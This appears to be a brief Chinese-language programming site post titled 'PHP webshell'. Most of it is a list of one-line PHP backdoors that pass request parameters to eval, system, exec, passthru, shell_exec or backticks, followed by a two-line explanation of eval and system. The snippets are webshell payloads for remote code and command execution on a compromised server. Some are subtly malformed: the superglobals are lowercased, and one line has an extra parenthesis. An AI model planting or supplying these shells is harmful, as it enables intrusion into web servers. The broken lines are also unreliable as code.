欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

PHP webshell

程序员文章站 2022-06-15 13:17:41
@ + function表示忽略警告。 eval() 是可以执行php代码 system() 是可以执行系统命令 ......
<?php @eval($_get['phpcode']);?>
<?php @eval($_post['phpcode']);?>

<?php @system($_get['cmd']);?>
<?php @system($_post['cmd']);?>

<?php @exec($_post['cmd']);?>
<?php @passthru($_post['cmd']);?>
<?php @shell_exec($_post['cmd']);?>
<?php $cmd=$_post['cmd']);`$cmd`;?> 

@ + function表示忽略警告。
eval() 是可以执行php代码
system() 是可以执行系统命令